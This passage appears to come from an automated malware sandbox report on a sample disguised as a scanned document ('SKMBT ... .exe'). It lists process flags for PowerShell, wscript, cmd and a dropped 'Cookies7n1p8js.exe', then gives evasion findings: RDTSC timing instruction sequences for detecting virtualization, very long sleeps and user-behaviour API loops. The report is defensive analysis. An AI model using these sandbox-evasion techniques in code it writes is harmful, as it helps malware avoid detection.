Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | RDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | RDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 00000000005C7244 second address: 00000000005C724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 00000000005C74AE second address: 00000000005C74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | RDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | RDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 0000000000637244 second address: 000000000063724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 00000000006374AE second address: 00000000006374B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_004073E0 rdtsc 5_2_004073E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3420
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1431
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3629
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1275
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | API coverage: 3.9 %